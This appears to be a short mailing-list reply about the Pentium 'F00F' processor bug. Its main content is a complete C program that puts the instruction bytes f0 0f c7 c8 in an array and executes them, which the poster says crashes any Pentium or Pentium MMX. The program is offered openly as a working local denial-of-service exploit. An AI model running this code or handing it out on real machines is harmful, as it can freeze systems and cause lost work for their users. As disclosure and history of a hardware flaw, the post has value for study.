Re: pentium bug mail

Koree A. Smith said:
> Umm...I didn't realize, but that program is the executable, not the source.  I
> wouldn't suggest running that binary.  I'm trying to get the source code from
> someone on bugtraq.  I'll post it here when I get it.

I never saw an update to this, so I thought I'd provide one...

This code will crash any Intel Pentium/Pentium MMX processor.

char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };

main ()
{
       void (*f)() = x;

       f();
}

Apparently Cyrix 6x86 processors are affected by a similar bug, but I
haven't looked into that too closely.  No other processors are
vulnerable.  Intel is working on a fix/work-around.

(217)698-1694             | Meetings the 1st and 3rd Mondays of every month.